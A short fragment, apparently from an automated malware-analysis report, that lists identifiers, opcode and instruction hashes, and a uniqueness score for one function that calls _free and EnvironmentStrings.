      • API ID: _free$EnvironmentStrings
      • String ID: @Mj
      • API String ID: 3523873077-1735126492
      • Opcode ID: 9f3a66131b91011e95283c773f7170fcbae29efaabce5cf845b522577050562f
      • Instruction ID: eccafcaf118081e4a83d4b0de7d1d9aadce288f13b002f342b8f899fd00c3ee3
      • Opcode Fuzzy Hash: 9f3a66131b91011e95283c773f7170fcbae29efaabce5cf845b522577050562f
      • Instruction Fuzzy Hash: B5E0926790D7210AA7313A3F6C02BEA36554BC1370B21025AE820C72E2DEB488437DB9
      Uniqueness

      Uniqueness Score: -1.00%